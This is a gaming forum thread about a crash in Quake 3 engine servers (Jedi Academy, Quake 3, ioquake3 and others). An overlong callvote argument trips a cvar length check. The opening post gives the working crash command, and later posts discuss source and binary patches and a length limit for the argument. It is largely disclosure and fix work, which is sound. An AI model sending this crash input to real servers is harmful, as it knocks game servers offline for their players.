crash by callvote q3engine ( jedi academy )

yberion · **Joined:** 17 Feb 2010 17:21 **Posts:** 3

I recently found a new crash by callvote.
Write it in a file. Cfg, crash.cfg example:

Code:

callvote fraglimit 20aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

And the server crashes with the following message:

********************

Code:

ERROR: Cvar_Update: 319 src 20aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa length exceeds MAX_CVAR_VALUE_STRING
*******************

If a server of any mod with or without the last jampgamex86.dll I can crash it.

aluigi · **Posted:** 10 Mar 2010 15:01

after some tests:

- vulnerables (all latest versions till today):
Jedi Academy
Jedi Knight 2
Quake 3
ioquake3
Medal of Honor (crash with more bytes ~700)

- seem not vulnerables:
Call of Duty series
Enemy Territory

the good way to fix this bug would be to patch game\g_cmds.c from:

Code:

   trap_Argv( 1, arg1, sizeof( arg1 ) );
   trap_Argv( 2, arg2, sizeof( arg2 ) );

to

Code:

   trap_Argv( 1, arg1, sizeof( arg1 ) );
   trap_Argv( 2, arg2, 64 );  // must be minor than 256

but the problem is that Cmd_CallVote_f is a part of the code not located in the core of the game, so it's not possible to make an universal fix because the code is located in the *game*.dll file or in the vm one (depending by what solution is adopted by the game, easy job with the dll).

example of how looks the compiled code in qagamex86.dll:

Code:

:6D6F94BE C7042401000000          mov dword ptr [esp], 00000001
:6D6F94C5 B800040000              mov eax, 00000400             ; sizeof( arg1 )
:6D6F94CA 8DBDE8FBFFFF            lea edi, dword ptr [ebp+FFFFFBE8]
:6D6F94D0 89442408                mov dword ptr [esp+08], eax
:6D6F94D4 BE00040000              mov esi, 00000400             ; sizeof( arg2 ) (set it to 0000003F!)
:6D6F94D9 897C2404                mov dword ptr [esp+04], edi
:6D6F94DD E83E810100              call 6D711620                 ; trap_Argv
:6D6F94E2 89742408                mov dword ptr [esp+08], esi
:6D6F94E6 8D8DE8F7FFFF            lea ecx, dword ptr [ebp+FFFFF7E8]
:6D6F94EC 894C2404                mov dword ptr [esp+04], ecx
:6D6F94F0 C7042402000000          mov dword ptr [esp], 00000002 ; 2
:6D6F94F7 E824810100              call 6D711620                 ; trap_Argv

and example of jampgame.dll (remember that must be updated the one in the pk3 files):

Code:

:2007DA2B 6800040000              push 00000400
:2007DA30 8D54240C                lea edx, dword ptr [esp+0C]
:2007DA34 52                      push edx
:2007DA35 6A01                    push 00000001
:2007DA37 E834850200              call 200A5F70
:2007DA3C 6800040000              push 00000400  ; fix this one
:2007DA41 8D842418040000          lea eax, dword ptr [esp+00000418]
:2007DA48 50                      push eax
:2007DA49 6A02                    push 00000002
:2007DA4B E820850200              call 200A5F70

so an alternative solution would be to remove the shutdown of the server caused by the following instructions in qcommon\cvar.c:

Code:

   if ( strlen(cv->string)+1 > MAX_CVAR_VALUE_STRING ) 
     Com_Error( ERR_DROP, "Cvar_Update: src %s length %zd exceeds MAX_CVAR_VALUE_STRING",
           cv->string, 
           strlen(cv->string));
   Q_strncpyz( vmCvar->string, cv->string,  MAX_CVAR_VALUE_STRING ); 

the quake 3 engine uses the safe Q_strncpyz function so there is absolutely no problem in removing Com_Error.
but there is a little problem when the server (or the match) restarts because some games like JKA crash during the building of the init string containing the long cvar while in others this string could result truncated.
so the admin should force the resetting of these cvars in some way.

obviously the best "fix" is to disable callvote as I have ever suggested

yberion · **Joined:** 17 Feb 2010 17:21 **Posts:** 3

In q_shared.h i change :

Code:

#define   MAX_STRING_TOKENS   1024   // max tokens resulting from Cmd_TokenizeString

To :

Code:

#define   MAX_STRING_TOKENS   75   // max tokens resulting from Cmd_TokenizeString

And now i can't crash.

aluigi · **Posted:** 10 Mar 2010 20:49

uhmm modifying that define is not a so good change because it's used also in other things.
you can have the same effect (and exactly like the second fix I propose) by modifying:

Code:

void Cmd_CallVote_f( gentity_t *ent ) {
   char*   c;
   int      i;
   char   arg1[MAX_STRING_TOKENS];
   char   arg2[MAX_STRING_TOKENS];

to

Code:

void Cmd_CallVote_f( gentity_t *ent ) {
   char*   c;
   int      i;
   char   arg1[MAX_STRING_TOKENS];
   char   arg2[75];

evan1715 · **Posted:** 11 Mar 2010 02:18

u limited it to 75?!?!?
noooooooo never lol. 75 is nothing!
if anything limit it to like 1000 or 900, geez.
and this isn't really new, u can do it on other commands
it's msgboom/msgbof on another cmd, that's not really new, others have tried my friend :)
also i dont really consider this a real 'crash' because voting has to be enabled and in like 85% of the servers voting is not enabled
it's like trying to find a non-VAC server, they're there but probably no one is in them, they're full of bots, they're laggy or they just suck.

aluigi · **Posted:** 11 Mar 2010 08:21

this problem and msgboom are two different things and on internet there was no reference to this problem although it's so basic and anyone has tried it at least one time in his life (included me, probably I tested it with CoD that's why I had no results... mistery).
instead it's good to limit the size of arg2 (NOT the size of MAX_STRING_TOKENS)

yberion · **Joined:** 17 Feb 2010 17:21 **Posts:** 3

evan1715 wrote:

u limited it to 75?!?!?
noooooooo never lol. 75 is nothing!
if anything limit it to like 1000 or 900, geez.
and this isn't really new, u can do it on other commands
it's msgboom/msgbof on another cmd, that's not really new, others have tried my friend :)
also i dont really consider this a real 'crash' because voting has to be enabled and in like 85% of the servers voting is not enabled
it's like trying to find a non-VAC server, they're there but probably no one is in them, they're full of bots, they're laggy or they just suck.

75 ? is enough.

Code:

/callvote fraglimit 1000000000000000000000000000000000000000000000000000000000000000000000000

And yes its a crash, on jka, 50% of servers have enabled the vote and 50% of servers have disabled the vote because a "hacker" can take the rcon with the callvote faille.

evan1715 · **Posted:** 12 Mar 2010 02:42

75 is for ur personal use but for client and server stuff it isn't...
the crash thing was more of an opinion ("i dont really consider" that's an opinion statement)
and my percentages were right based upon jk3 1.0 and all jk2 versions because i dont like/play jk3 1.01

aluigi · **Posted:** 12 Mar 2010 07:55

75 in arg2 is considered the max length of the second argument, so:
callvote map aaaaa_75_aaaa
callvote kick aaaaa_75_aaaa

and considering the normal/max length of maps and nicknames it seems more than enough

Luigi Auriemma

crash by callvote q3engine ( jedi academy )